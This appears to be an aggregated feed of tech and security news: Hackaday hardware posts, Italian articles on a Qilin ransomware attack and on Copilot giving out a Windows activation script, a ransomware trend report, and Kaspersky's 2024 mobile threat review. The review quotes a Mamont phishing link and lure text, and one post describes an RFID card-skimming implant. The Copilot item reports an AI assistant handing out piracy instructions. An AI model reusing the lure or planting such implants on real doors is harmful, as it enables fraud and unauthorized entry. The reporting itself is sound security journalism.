Want to make your own air knife to cut things with? Unfortunately that’s not what these devices are intended for, but [This Old Tony] will show you how to make your own, while explaining what they are generally intended for. His version deviates from the commercial version which he got his hands on in that he makes a round version instead of the straight one, but the concept is the same.

In short, an air knife is a laminar pressurized airflow device that provides a very strong and narrow air pattern, using either compressed air or that from a blower. Generally air knives will use the Coandă effect to keep the laminar flow attached to the device for as long as possible to multiply the air pressure above that from the laminar flow from the air knife itself. These are commonly used for cleaning debris and dust off surfaces in e.g. production lines.

As [Tony] shows in the disassembly of a commercial device, they are quite basic, with just two aluminium plates and a thin shim that creates the narrow opening through which the air can escape. The keyword here is ‘thin shim’, as [Tony] discovers that even a paper shim is too thick already. Amusingly, although he makes a working round air knife this way, it turns out that these are generally called an air amplifier, such as those from Exair and are often used for cooling and ventilation, with some having an adjustable opening to adjust the resulting airflow.

Some may recognize this principle for those fancy ‘bladeless’ fans that companies like Dyson sell, as they use essentially the same principle, just with a fan providing the pressure rather than a compressor.

youtube.com/embed/-lkgAYe-8_s?…

hackaday.com/2025/03/03/make-y…

Some of our devices look like they’re straight out of hacker movies. For instance, how about a small board you plant behind an RFID reader, collecting access card data and then replaying it when you next walk up the door? [Jakub Kramarz] brings us perhaps the best design on the DIY market, called The Tick – simple, flexible, cheap, tiny, and fully open-source.

Take off the reader, tap into the relevant wires and power pins (up to 25V input), and just leave the board there. It can do BLE or WiFi – over WiFi, you get a nice web UI showing you the data collected so far, and letting you send arbitrary data. It can do Wiegand like quite a few open-source projects, but it can also do arbitrary clock+data protocols, plus you can just wire it up quickly, and it will figure out the encoding.

We could imagine such a board inside a Cyberpunk DnD rulebook or used in Mr Robot as a plot point, except that this one is real and you can use it today for red teaming and security purposes. Not to say all applications would be NSA-catalog-adjacent pentesting – you could use such a bug to reverse-engineer your own garage door opener, for one.

hackaday.com/2025/03/03/heres-…

A team from the University of Chicago brings us a new spin on sensory substitution, the “Seeing with the Hands” project, turning external environment input into sensations. Here specifically, the focus is on substituting vision into hand sensations, aimed at blind and vision disabled. The prototype is quite inspiration-worthy!

On the input side, we have a wrist-mounted camera, sprinkled with a healthy amount of image processing, of course. As for the output, no vibromotors or actuators are in use – instead, tactile receptors are stimulated by passing small amounts of current through your skin, triggering your touch receptors electrically. An 8×8 array of such “tactile” pixels is placed on the back of the hand and fingers. The examples provided show it to be a decent substitution.

This technique depends on the type of image processing being used, as well as the “resolution” of the pixels, but it’s a fun concept nevertheless, and the study preprint has some great stories to tell. This one’s far from the first sensory substitution devices we’ve covered, though, as quite a few of them were mechanical in nature – the less moving parts, the better, we reckon!

hackaday.com/2025/03/03/sensor…

Join us on Wednesday, March 5 at noon Pacific for the Deep Space DX Hack Chat with David Prutchi!

In the past 70-odd years, the world’s space-faring nations have flung a considerable amount of hardware out into the Void. Most of it has fallen back into Earth’s gravity well, and a lot of what remains is long past its best-by date, systems silenced by time and the harsh conditions that rendered these jewels of engineering into little more than space flotsam.

Luckily, though, there are still a few spacecraft plying the lonely spaces between the planets and even beyond that still have active radios, and while their signals may be faint, we can still hear them. True, many of them are reachable only using immense dish antennas.

Not every deep-space probe needs the resources of a nation-state to be snooped on, though. David Prutchi has been listening to them for years using a relatively modest backyard antenna farm and a lot of hard-won experience. He’s been able to bag some serious DX, everything from rovers on Mars to probes orbiting Jupiter. If you’ve ever wanted to give deep space DX a try, here’s your chance to get off on the right foot.

Our Hack Chats are live community events in the Hackaday.io Hack Chat group messaging. This week we’ll be sitting down on Wednesday, March 5 at 12:00 PM Pacific time. If time zones have you tied up, we have a handy time zone converter.

hackaday.com/2025/03/03/deep-s…

The 12VHPWR connector is a hot topic once again – Nvidia has really let us down on this one. New 5080 and 500 GPUs come with this connector, and they’re once again fire-prone. Well, what if you’re stuck with a newly-built 5080, unwilling to give it up, still hoping to play the newest games or run LLMs locally? [Timo Birnschein] has a simple watchdog solution for you, and it’s super easy to build.

All it takes is an Arduino, three resistors, and three thermistors. Place the thermistors onto the connector’s problematic spots, download the companion software from GitHub, and plug the Arduino into your PC. If a temperature anomaly is detected, like one of the thermistors approaching 100C, the Arduino will simply shut down your PC. The software also includes a tray icon, temperature graphing, and stability features. All is open-source — breadboard it, flash it. You can even add more thermistors to the mix if you’d like!

This hack certainly doesn’t just help protect you from Nvidia’s latest creation – it can help you watch over any sort of potentially hot mod, and it’s very easy to build. Want to watch over connectors on your 3D printer? Build one of these! We’ve seen 12VHPWR have plenty of problems in the past on Nvidia’s cards – it looks like there are quite a few lessons Nvidia is yet to learn.

hackaday.com/2025/03/03/12vhpw…

Have you been to FOSDEM? It’s a yearly two-day megaconference in Brussels, every first weekend of February. Thousands of software and hardware hackers from all across Europe come here each year, make friends, talk software and hardware alike, hold project-specific meetups to drink beer and talk shop, and just have a fun weekend surrounded by like-minded people.

In particular, FOSDEM has free admission – drop by for the weekend, no need to buy entry tickets, just sort out your accomodation, food, travel, and visit for a day or two. I’ve covered FOSDEM quite extensively in 2023, so if you want to know more about how it works, I invite you to check out that article – plenty of stories, cool facts about FOSDEM, showcases, and so on. This year, I’ve also been to FOSDEM, it’s been pretty great, and I’d like to tell you about cool things I’ve seen happen during FOSDEM 2025.

FOSDEM is often described as an open software conference, and you might’ve had been fooled by this if you simply have checked the Wikipedia page. However, let me assure you – there’s always plenty of hardware, large amounts of it! This year, I feel like hardware has taken the spotlight in particular – let me show you at least some of it, so that you know what kinds of cool stuff you can expect and plan for in 2026.

Even Software Was Hardware

Really, the kinds of software FOSDEM hosts, can’t exist without a healthy dose of hardware. Yes, there was no shortage of purely software-specific stands – if you wanted a Debian t-shirt, some Fedora or Jenkins stickers, or a selfie with the Postgresql elephant, they were always at an arm’s reach. Pure software was a surprisingly small part of FOSDEM this year, and I have some theories about it.

This year, it felt like half of all stands were hardware-based, hardware-related, or hardware-dependent in one way or another. First off, of course, hardware is flashy, it makes for effective demos. For instance, if you wanted to drop by, you’d find a Jenkins cluster running on a gaggle of SBCs mounted to a 3D-printed frame – a new and vastly improved build from the version we’ve covered in 2023!

A number of project stands – PostmarketOS, CalyxOS, FuriLabs, – had desks full of smartphones demoing their phone OS offerings. You’d see SteamDecks being used as software demo machines, the FreeCAD table had a laptop running the newest FreeCAD install you could poke and probe (with even a surprise MNT Reform appearance), SBCs common and obscure running demo playback and presentations – making the software world tangible.

Really, if you’re demoing an open-source smart home system, like OpenHAB did, what’s better than bringing a smart-home-in-a-briefcase? And if you’re bringing an open-source game engine, what’s better than demoing it on a SteamDeck? Software has the disadvantage of being quite intangible, and hardware “grounds” it enough that anyone can interact it, conveying code as colours, shapes, and objects in the real world – which is perfect if what you’re starting with is a Git repository, and what you need to create is a conference table people would be interested in.

And Hardware Was Extra Hardware

Of course, we’ve met the usual open-source suspects of the hardware world, too. KiCad and FreeCAD split a table this year. They had logos familiar enough to the crowd that they really didn’t need extra hardware to stand out – instead, they brought merch and stickers. Nevertheless, on the FreeCAD-KiCad split of the table, you’d find a guest exhibit from the Libre Space Foundation, a model of the Picobus V2 satellite launching system, which was incidentally designed with help of both FreeCAD and KiCad.

Next to them, you’d find MicroPython, Espruino, and TinyGo, all promoting high-level languages for microcontrollers, for those of us unemburdened by obligations of memory safety and static typing. In the H building, OpenFlexure had a desk all to themselves, and a Prusa printer was helping them crank out designs to be immediately demoed. Sadly, this year, Pine64 stand was missing – but Pine64 folks could still be found around!

One thing you’d see a ton this year? LoRa, in all forms. Of course, there was the Meshtastic table, with plenty of stickers and demo devices alike, but you’d also regularly find LoRa-equipped devices on tables. This wasn’t the only form of wireless tech, either – the AW building had desks with SDR setups, plenty of HAM tech, and outside on the grass, a group of hackers with radio equipment and a dish antenna setup.

I’ve seen a couple tables being crashed with cool tech, too! For instance, you could meet [arturo182] and his creations (including a hacker-friendly keyboard module series) on Saturday in the AW building, taking up part of the TinyGo table – not scheduled, but definitely most welcome! On one of the desks in the K building, you could find two MNT Reform demo units, one full-sized and one Pocket, on the Genode table – unsurprisingly, there was always a crowd around that table, so if you didn’t notice it, that’s why!

One more recommendation, which doesn’t apply just to FOSDEM – you might want to get a FOSSAsia LED matrix name badge. Nowadays, I tend to go to events in friend groups, and I’ve been surprised how many my friends have gotten themselves the FOSSAsia name badges – the FOSSAsia community is a mainstay at tech events in Europe, so if you’re visiting one and you see these badges around, just look for the FOSSAsia desk to get one. These badges are respectably flashy — you pick the colour! — great for meeting new people in the crowds, and quite cheap! I’ve also learned that FOSSAsia have been improving the badge’s firmware over the years – as far as I can tell, if you’ve ever bought a nametag from FOSSAsia, simply update its firmware with help of your smartphone, and get a number of new features.

Eagerly Awaiting FOSDEM 26

There’s always more to FOSDEM, but this year, I’d like to simply show you all the hardware there was to see. Want to learn more? Check back to the FOSDEM 23 coverage, detailing how FOSDEM operates, talking about their volunteer-rooted structure, the principles and tricks FOSDEM uses to keep the open software world ever so closer together, or perhaps the impressive video recording infrastructure making sure that talks are livestreamed dutifully and published nigh-instantly… Plenty to learn about FOSDEM’s MO! Apart from that, FreeCAD, PostmarketOS, Meshtastic and a good few open-source orgs have made post-FOSDEM blog posts, check them out if you’d like to hear how FOSDEM and your favourite projects meshed together.

FOSDEM is undoubtedly the time and place to celebrate open software in Europe, and at the same time, it’s also a super friendly spot for those of us of Hackaday upbringing. If you’re looking for somewhere to go next February, as a hardware hacker, my understanding is that you won’t be disappointed!

L’orchestra sinfonica di Houston è diventato una vittima del gruppo degli hacker Qilin. Le informazioni sull’attacco informatico sono apparse sul sito web del gruppo. Gli estorsori hanno indicato una scadenza per il riscatto e un contatto TOX per le trattative.

Gli hacker affermano di aver rubato più di 300 GB di dati dell’orchestra e intendono pubblicarli il 5 marzo 2025, lo stesso giorno Scade l’ultimatum per Lee Enterprises. Qilin afferma che i dati rubati includono i resoconti di bilancio dell’orchestra per ottobre 2024, documenti finanziari per maggio 2024 e un piano di sviluppo strategico fino al 2030.

Tra i campioni pubblicati sono inclusi anche elenchi di amministratori fiduciari e membri del consiglio di amministrazione con informazioni personali, tra cui indirizzi, numeri di telefono e indirizzi e-mail. Non è ancora chiaro se i file rubati contengano informazioni finanziarie o personali sui musicisti, sullo staff e sui possessori dei biglietti. L’orchestra non ha ancora commentato la situazione e gli ulteriori sviluppi restano incerti.

Poco dopo la pubblicazione, il post è scomparso dall’elenco sul sito web del gruppo (come riportato da cybernews). Ciò potrebbe indicare che l’organizzazione è entrata in contatto con criminali informatici e potrebbe essere in trattativa per un riscatto in cambio dei dati.

Fondata nel 1913, la Houston Symphony Orchestra è una delle più antiche organizzazioni musicali degli Stati Uniti. L’ensemble è composto da 60 musicisti professionisti che tengono circa 170 concerti all’anno e si esibiscono in oltre 1.000 eventi in scuole, ospedali, chiese e centri comunitari. Il budget annuale dell’orchestra è di circa 28,8 milioni di dollari e la sala concerti può ospitare fino a 2.900 persone, attirando circa 400.000 spettatori ogni anno.

L'articolo Concerto per Ransomware e Orchestra! Qilin Ruba 300 GB di Dati alla Houston Symphony proviene da il blog della sicurezza informatica.

Gli utenti hanno scoperto che se chiedono all’assistente Copilot AI se esiste uno script per attivare Windows 11, riceveranno una guida dettagliata con le istruzioni su come attivare il sistema operativo.

La scorsa settimana, un utente di Reddit ha condiviso una evidenza secondo cui se si chiede alla versione gratuita di Copilot “esiste uno script per attivare Windows 11?”, l’assistente AI fornirà all’utente una guida che include uno script dal repository GitHub di Microsoft Activation Scripts (MAS) che può essere utilizzato per attivare gratuitamente il sistema operativo.

Questo metodo di attivazione di Windows e Office non è nuovo ed è noto da diversi anni, ma un simile consiglio da parte dello strumento di intelligenza artificiale di Microsoft è sembrato molto strano agli utenti. Sebbene Copilot abbia ricordato che “l’utilizzo di metodi di attivazione non autorizzati potrebbe violare i termini di servizio di Microsoft”.

È opportuno sottolineare che gli strumenti del gruppo di cracker Massgrave sono posizionati come open source e che i file del progetto Microsoft Activation Scripts sono disponibili da parecchio tempo su GitHub, che appartiene a Microsoft. Allo stesso tempo, l’azienda non intraprende alcuna azione contro i cracker.

Vale anche la pena notare che di recente un ex dipendente dell’azienda ha affermato che a Microsoft non importa molto della pirateria perché “Microsoft vuole che tu usi Windows 11 perché il prodotto sei tu”.

Tuttavia, dopo che la notizia dello strano comportamento di Copilot si è diffusa attraverso i media e i social network, Microsoft ha chiuso questa falla.

Ora se chiedi a Copilot degli script per l’attivazione di Windows, l’assistente AI risponderà quanto segue: “Non posso aiutarti. L’attivazione di Windows 11 tramite script non autorizzati è illegale e viola i termini di servizio di Microsoft. Si consiglia di utilizzare metodi legittimi per attivare il software, per assicurarsi di ricevere aggiornamenti e supporto adeguati.Se hai bisogno di aiuto per l’attivazione di Windows 11, puoi visitare la pagina ufficiale del supporto Microsoft per ricevere assistenza”.

Come notano i giornalisti, ormai ogni tentativo di discutere con Copilot o di convincere l’IA a riconsiderare la sua decisione non produce alcun risultato.

L'articolo Microsoft Copilot fornisce agli utenti HowTo su come attivare Windows proviene da il blog della sicurezza informatica.

Got a Flipper Zero? Ever wanted to use a high-level but powerful scripting language on it? Thanks to [Oliver] we now have a MicroPython application for the Flipper, complete with a library for hardware and software feature support. Load it up, start it up, connect over USB, and you’ve got the ever-so-convenient REPL at your disposal. Or, upload a Python script to your Flipper and run them directly from Flipper’s UI at your convenience!

In the API docs, we’re seeing support for every single primitive you could want – GPIO (including the headers at the top, of course), a healthy library for LCD and LCD backlight control, button handling, SD card support, speaker library for producing tones, ADC and PWM, vibromotor, logging, and even infrared transmit/receive support. Hopefully, we get support for Flipper’s wireless capabilities at some point, too!

Check out the code examples, get the latest release from the Flipper app portal or GitHub, load it up, and play! Mp-flipper has existed for the better half of a year now, so it’s a pretty mature application, and it adds quite a bit to Flipper’s use cases in our world of hardware hacking. Want to develop an app for the Flipper in Python or otherwise? Check out this small-screen UI design toolkit or this editor we’ve featured recently!

hackaday.com/2025/03/03/a-micr…

These statistics are based on detection alerts from Kaspersky products, collected from users who consented to provide statistical data to Kaspersky Security Network. The statistics for previous years may differ from earlier publications due to a data and methodology revision implemented in 2024.

The year in figures

According to Kaspersky Security Network, in 2024:

• A total of 33.3 million attacks involving malware, adware or unwanted mobile software were prevented.
• Adware, the most common mobile threat, accounted for 35% of total detections.
• A total of 1.1 million malicious and potentially unwanted installation packages were detected, almost 69,000 of which associated with mobile banking Trojans.

The year’s trends

In 2024, cybercriminals launched a monthly average of 2.8 million malware, adware or unwanted software attacks targeting mobile devices. In total, Kaspersky products blocked 33,265,112 attacks in 2024.

Attacks on Kaspersky mobile users in 2024 (download)

At the end of 2024, we discovered a new distribution scheme for the Mamont banking Trojan, targeting users of Android devices in Russia. The attackers lured users with a variety of discounted products. The victim had to send a message to place an order. Some time later, the user received a phishing link to download malware disguised as a shipment tracking app.

The phishing link as seen in the chat with the fraudsters

See translation
Your order has shipped.
42609775
Your order tracking code.
You can track your order in the mobile app:
https://.pilpesti573.ru/page/e5d565fdfd7ce
Tracker
To pay for your order AFTER YOU RECEIVE IT, enter your tracking code IN THE APP above and wait for your order details to load. We recommend keeping the app open while you are doing so. Loading the track code may take more than 30 minutes.

In August 2024, researchers at ESET described a new NFC banking scam discovered in the Czech Republic. The scammers employed phishing websites to spread malicious mods of the legitimate app NFCGate. These used a variety of pretexts to persuade the victim to place a bank card next to the back of their phone for an NFC connection. The card details were leaked to the fraudsters who then made small contactless payments or withdrew money at ATMs.

A similar scheme was later spotted in Russia, where malware masqueraded as banking and e-government apps. The SpyNote RAT was occasionally used as the malware dropper and NFC activator.

A screenshot of the fake mobile app

See translation
Hold your card against the NFC contactless payment module for verification.
Ready to scan

Also in 2024, we detected many new preinstalled malicious apps that we assigned the generalized verdict of Trojan.AndroidOS.Adinstall. A further discovery, made in July, was the LinkDoor backdoor, also known as Vo1d, installed on Android-powered TV set-top boxes. It was located inside an infected system application com.google.android.services. The malware was capable of running arbitrary executables and downloading and installing any APKs.

On top of the above, we discovered several apps on Google Play, each containing a malicious SDK implant named “SparkCat”, which began to spread at least as early as March 2024. Infected apps were deleted by the store in February 2025: nevertheless, our telemetry data shows that other apps containing SparkCat are distributed through unofficial sources.

This SDK received a C2 server command with a list of keywords or dictionaries to search the gallery on the device for images to exfiltrate. Our data suggests that the Trojan was aimed at stealing recovery phrases for cryptocurrency wallets of Android users primarily in the UAE, Europe and Asia.

It is worth noting that the same implant for iOS was delivered via the App Store, which makes it the first known OCR malware to sneak into Apple’s official marketplace. Apple removed the infected apps in February 2025.

Mobile threat statistics

We discovered 1,133,329 malicious and potentially unwanted installation packages in 2024. This was below the 2023 figure, but the difference was smaller than the year before. The trend in the number of new unique malware installation packages appears to be plateauing.

Detected Android-specific malware and unwanted software installation packages in 2021–2024 (download)

Detected packages by type

Detected mobile apps by type in 2023 and 2024 (download)

Adware and RiskTool apps continued to dominate the rankings of detected threats by type. The BrowserAd (22.8%), HiddenAd (20.3%) and Adlo (16%) families accounted for the largest number of new installation packages in the former category. RiskTool’s share grew largely due to an increase in the number of Fakapp pornographic apps.

Share* of users attacked by the given type of malware or unwanted software out of all targeted Kaspersky mobile users in 2023–2024 (download)

*The total may exceed 100% if the same users experienced multiple attack types.

Banking Trojans gained three positions as compared with 2023 to occupy fourth place, following the usual leaders: adware, Trojans, and RiskTool.

TOP 20 most frequently detected types of mobile malware

Note that the malware rankings below exclude riskware and potentially unwanted apps, such as adware and RiskTool.

* Share of unique users who encountered this malware as a percentage of all attacked Kaspersky mobile users

Fakemoney, a family of investment and payout scam apps, showed the highest level of activity in 2024. Third-party WhatsApp mods with the Triada.ga embedded Trojan were third, following the generalized cloud-specific verdict of DangerousObject.Multi.Generic. Many other messaging app mods in the same family, namely Triada.fd, Triada.gs, Triada.gn and Triada.gm, hit the TOP 20 too.

Mamont banking Trojans, ranking fourth by number of attacked users, gained high popularity with cybercriminals. These malicious apps come in a multitude of variants. They typically target users’ funds via SMS or USSD requests. One of them spreads under the guise of a parcel tracking app for fake online stores.

Various malware files detected by machine learning technology ranked fifth (Trojan.AndroidOS.Boogr.gsh) and seventh (DangerousObject.AndroidOS.GenericML). They were followed by the Dwphon Trojan that came preinstalled on certain devices. The SpyNote RAT Trojans, which remained active throughout the year, occupied ninth, tenth and twentieth places.

Region-specific malware

This section describes malware types that mostly affected specific countries.

* Country where the malware was most active
* Share of unique users who encountered the malware in the indicated country as a percentage of all Kaspersky mobile security users attacked by the malware

Turkey and India accounted for the majority of region-specific threats in 2024. A variety of banking Trojans continued to be active in Turkey. Piom Trojans were associated with GodFather and BrowBot banker campaigns.

Users in India were attacked by Rewardsteal bankers and a variety of SmsThief SMS spies. Our quarterly reports have covered FakePay utilities widespread in Brazil and designed to defraud sellers by imitating payment transactions.

Mobile banking Trojans

The number of new banking Trojan installation packages dropped again to 68,730 as compared to the previous year.

The number of mobile banking Trojan installation packages detected by Kaspersky in 2021–2024 (download)

The total number of banker attacks increased dramatically over 2023’s level despite the drop in the number of unique installation packages. The trend has persisted for years. This may suggest that scammers began to scale down their efforts to generate unique applications, focusing instead on distributing the same files to a maximum number of victims.

TOP 10 mobile bankers

* Share of unique users who encountered this malware as a percentage of all users of Kaspersky mobile security solutions who encountered banking threats

Conclusion

The number of unique malware and unwanted software installation packages continued to decline year to year in 2024. However, the rate of that decline slowed down. The upward trend in mobile banking Trojan activity persisted despite the years-long decrease in unique installation packages.

Cybercriminals kept trying to sneak malware into official app stores like Google Play, but we also discovered a fair number of diverse preinstalled malicious apps in 2024. Speaking of interesting techniques first spotted last year, the use of NFC for stealing bank card data stands out.

securelist.com/mobile-threat-r…

What do you do when you need to choose an OS at boot but aren’t physically near your machine? [Dakhnod]’s inventive solution is a mix of GRUB, Wake-on-LAN (WOL), and a lightweight ESP8266 running a simple HTTP server. In the past, [dakhnod] already enlightened us with another smart ESP hack. This one’s a clever combination of network booting and remote control that opens up possibilities beyond the usual dual-boot selector.

At its core, the hack modifies GRUB to fetch its boot configuration over HTTP. The ESP8266 (or any low-power device) serves up a config file defining which OS should launch. The trick lies in adding a custom script that tells GRUB to source an external config:
#!/usr/bin/env cat
net_dhcp
source (http,destination_ip_or_host:destination_port)/grub/config
Since GRUB itself makes the HTTP request, the system needs a running web server. That could be a Raspberry Pi, another machine, or the ESP itself. From there, a WOL-enabled ESP button can wake the PC and set the boot parameters remotely.

Is it secure? Well, that depends on your network. An open, unauthenticated web server dishing out GRUB configs is risky, but within a controlled LAN or a VLAN-segmented environment, it’s an intriguing option. Automation possibilities are everywhere — imagine remotely booting test rigs, toggling between OS environments for debugging, or even setting up kiosk machines that reconfigure themselves based on external triggers.

For those looking to take it further, using configfile instead of source allows for more dynamic menu entries, although it won’t persist environment variables. You could even combine it with this RasPi hack to control the uptime of the HTTP server. The balance between convenience and security is yours to strike.

If you’ve got your own wild GRUB customisation, let’s hear it!

hackaday.com/2025/03/03/wake-b…

Il ransomware continua a rappresentare una delle minacce più pervasive e dannose nel panorama della cybersecurity globale. Secondo il report “DarkMirror” di DarkLab, relativo al secondo semestre del 2024, gli attacchi ransomware hanno mostrato un’evoluzione significativa sia nelle tecniche utilizzate che negli obiettivi colpiti. Questo report emesso dal collettivo DarkLab (il laboratorio sull’intelligence delle minacce di Red Hot Cyber) offre una panoramica delle principali tendenze emerse, con un focus sui dati quantitativi e sulle implicazioni per la sicurezza informatica.

Vengono analizzati i trend globali del ransomware nel secondo semestre del 2024, con un focus sulle tendenze emergenti, le tattiche dei gruppi criminali e l’impatto sui vari settori. Viene approfondita la situazione del comparto Italia, evidenziando le peculiarità del contesto nazionale. Si esplora inoltre il lato oscuro dell’intelligenza artificiale, utilizzata sempre più spesso dai cybercriminali per ottimizzare gli attacchi. Il report dedica ampio spazio ai Threat Actors, con un’analisi dettagliata della loro evoluzione e le nuove tecniche, tattiche e procedure (TTPs).

Non mancano approfondimenti sulle operazioni di law enforcement condotte a livello internazionale e un’analisi dell’economia del ransomware, inclusa una valutazione delle transazioni dei wallet criminali. Infine, il report include interviste ai Threat Actors (constantemente svolte da Red Hot Cyber) e una rassegna sui nuovi gruppi emersi nel panorama delle minacce.

Il report è stato realizzato dal gruppo DarkLab e nello specifico da Pietro Melillo, Olivia Terrangi, Alessio Stefan, Carlo Mauceli, Inva Malaj, Luca Galuppi, Massimiliano Brolli, Edoardo Faccioli, Raffaela Crisci, Andrea Mario Muscarà.

Scarica il report DarkMirror : il Report sulla minaccia ransomware di H2 2024

Trend Ransomware a livello globale

Il fenomeno del ransomware nel 2024 ha continuato a rappresentare una minaccia persistente e in crescita (Come visto nell’estratto di Pietro Melillo, Andrea Mario Muscarà ed Inva Malaj), colpendo indistintamente sia economie sviluppate che in via di sviluppo. Secondo i dati raccolti da Dark Lab, sono state documentate 5333 vittime di attacchi a livello globale, un numero che rappresenta solo una frazione della reale portata del problema. Gli Stati Uniti si confermano il paese più colpito, con 2748 vittime documentate, seguiti da Canada (283), Regno Unito (277) e Germania (168). Questo dimostra che le nazioni con infrastrutture digitali avanzate sono tra i principali obiettivi dei cybercriminali.

L’industria e i servizi emergono come i settori economici più bersagliati dagli attacchi ransomware. Con 898 attacchi registrati, il comparto industriale è quello maggiormente colpito, a causa delle vulnerabilità presenti nelle sue infrastrutture IT. Il settore dei servizi segue con 777 attacchi, evidenziando rischi significativi nella gestione dei dati critici. Anche la costruzione (462 attacchi) e la tecnologia (424 attacchi) sono particolarmente esposte, dato il valore delle informazioni sensibili trattate.

La sanità rappresenta un altro settore chiave colpito, con 413 attacchi registrati, mettendo a rischio la sicurezza dei dati dei pazienti e la continuità operativa delle strutture sanitarie. I comparti del retail (325 attacchi), finanziario (288 attacchi) e pubblico (273 attacchi) mostrano anch’essi un’esposizione elevata, mentre settori come l’educazione (230 attacchi) e Hospital (192 attacchi) subiscono attacchi con impatti generalmente meno critici ma comunque rilevanti.

L’analisi dei dati conferma che il ransomware non risparmia alcun settore e si adatta alle vulnerabilità specifiche di ciascun comparto. La crescente sofisticazione delle tecniche di attacco, unite alla strategia della doppia estorsione, impongono misure di sicurezza più efficaci per proteggere le infrastrutture critiche e i dati sensibili. Investire in cybersecurity e resilienza digitale diventa sempre più essenziale per mitigare i danni causati da questa minaccia globale.

[strong]Scarica il report DarkMirror : il Report sulla minaccia ransomware di H2 2024[/strong]

Trend Ransomware a livello Italia

L’analisi delle minacce ransomware in Italia nel 2024, rileva che c’è stata una importante flessione delle vittime che sono passate dalle 192 del 2023 alle 149 del 2024 (Come visto nell’estratto di Luca Galuppi e Marco Mazzola). Altresì evidenziamo una crescente concentrazione di attacchi in settori strategici, con l’industria che si conferma il bersaglio principale, seguita dal retail e dal comparto tecnologico. Gli attacchi rivolti alle infrastrutture critiche, come energia e sanità, pur rappresentando una percentuale inferiore, restano di particolare interesse per il loro potenziale impatto. Questo scenario sottolinea l’urgenza di strategie di difesa avanzate per proteggere i comparti chiave dell’economia nazionale.

Dal punto di vista degli attori malevoli, il gruppo RansomHub si distingue come il più attivo, con 18 attacchi documentati, seguito da 8Base e LockBit 3, entrambi con 12 attacchi. Altri gruppi di rilievo includono BlackBasta, Akira e Argoanuts, che continuano a rappresentare una minaccia significativa. Nonostante alcuni gruppi abbiano un numero inferiore di attacchi, come Hunters, Ciphbit, DragonForce e Meow, la loro attività non deve essere sottovalutata, in quanto spesso operano in modo mirato e con tecniche sofisticate.

Un elemento degno di nota è la variazione nella distribuzione degli attacchi tra i settori economici. Il comparto dei servizi mostra una crescita significativa negli attacchi subiti, mentre il settore tecnologico sembra registrare un lieve calo. Tuttavia, l’industria resta il principale obiettivo delle cyber gang, rendendo necessaria una risposta tempestiva per mitigare i rischi e rafforzare la resilienza delle infrastrutture critiche italiane.

Scarica DarkMirror : il Report sulla minaccia ransomware di H2 2024

Threat Actors: una analisi del contesto e della evoluzione

Proseguono nel secondo semestre 2024 complesse intrusioni multifase (come riportato dall’estratto di Olivia Terragni, Alessio Stefan, Pietro Melillo) di livello globale e nella scala operazionale si può notare sia il ‘declino’ di Lockbit sia una frammentazione, con l’emergere di nuovi ceppi ransomware in un’intensificazione di minacce significative distinte da pratiche sempre più intimidatorie e tecniche di attacco avanzate (utilizzate anche daI gruppi ATP) sempre più efficienti nell’eludere le difese.

Le nuove minacce nel panorama della cybersecurity stanno evolvendo rapidamente, con l’intelligenza artificiale (AI) che gioca un ruolo sempre più significativo (come riportato dall’estratto di Carlo Mauceli). L’AI non solo sta trasformando il modo in cui le organizzazioni si difendono dagli attacchi informatici, ma sta anche diventando uno strumento potente nelle mani dei cybercriminali. Questi ultimi stanno utilizzando l’AI per sviluppare malware più sofisticati, automatizzare attacchi e superare le difese tradizionali. La crescente accessibilità di strumenti di AI, come ChatGPT, ha sollevato preoccupazioni riguardo al loro potenziale utilizzo per scopi malevoli, tra cui la creazione di phishing più convincenti e la pianificazione di attacchi più mirati. Questo scenario richiede una risposta proattiva da parte delle forze dell’ordine e delle aziende di sicurezza per mitigare i rischi associati all’uso malevolo dell’AI.

Le operazioni internazionali di contrasto al ransomware hanno visto un’intensificazione negli ultimi anni, con sforzi coordinati tra agenzie di sicurezza, forze di polizia e unità specializzate in cyber intelligence. Operazioni come Cronos ed Endgame (come visto nell’estratto di Raffaela Crisci) hanno dimostrato l’efficacia di un approccio collaborativo, portando al smantellamento di infrastrutture critiche utilizzate dai gruppi ransomware e all’arresto di figure chiave. Ad esempio, l’Operazione Cronos ha colpito duramente il gruppo LockBit, sequestrando domini e compromettendo la loro infrastruttura interna. Queste operazioni non si limitano a semplici sequestri, ma includono tattiche di interferenza massiccia, come la diffusione di disinformazione all’interno delle reti criminali, minando la loro capacità operativa. Nonostante questi successi, i gruppi ransomware continuano ad adattarsi, sviluppando nuove varianti di malware e tecniche per eludere le autorità.

Un elemento di grande rilevanza all’interno del report sono le interviste ai Threat Actors condotte dal team DarkLab (come evidenziato nell’estratto di Massimiliano Brolli e Alessio Stefan). Nel secondo semestre del 2024, il gruppo è riuscito a intervistare diverse cyber gang ransomware, tra cui Ransom Cortex, RADAR, DISPOSSESSOR, Quilin, Lynx, Stormous e Interlock. Nel report precedente, invece, erano state pubblicate le interviste a Vari Group, Cicada6601 e Azzasec.

L’economia del ransomware è in costante crescita, con introiti che hanno superato il miliardo di dollari nel 2023. Le analisi condotte da DarkLab (come visto nell’estratto di Alessio Stefan ed Edoardo Faccioli) rivelano che, nonostante una diminuzione nel numero di transazioni, il saldo dei wallet collegati ai pagamenti ransomware è aumentato significativamente. Questo indica una strategia sempre più aggressiva da parte dei gruppi ransomware, che puntano su richieste di riscatto più elevate e su obiettivi di alto profilo. Le criptovalute continuano a essere il mezzo preferito per i pagamenti, grazie alla loro natura decentralizzata e alla difficoltà di tracciamento. Tuttavia, le forze dell’ordine stanno intensificando gli sforzi per monitorare e congelare i fondi illeciti, come dimostrato dal sequestro di oltre 30.000 wallet Bitcoin durante l’Operazione Cronos.

Scarica il report DarkMirror : il Report sulla minaccia ransomware di H2 2024

Conclusioni

Il report DarkMirror di DarkLab evidenzia come il ransomware continui a essere una delle minacce più devastanti nel panorama della cybersecurity globale. Nel secondo semestre del 2024, gli attacchi hanno subito un’evoluzione sia nelle tecniche che negli obiettivi, con un aumento della sofisticazione delle operazioni e una frammentazione del panorama dei Threat Actors. Le economie digitalmente avanzate restano i bersagli primari, con gli Stati Uniti in testa, mentre il settore industriale e quello dei servizi si confermano i più colpiti. La strategia della doppia estorsione e l’uso di tecnologie avanzate da parte dei cybercriminali impongono un rafforzamento delle misure di sicurezza per proteggere infrastrutture critiche e dati sensibili.

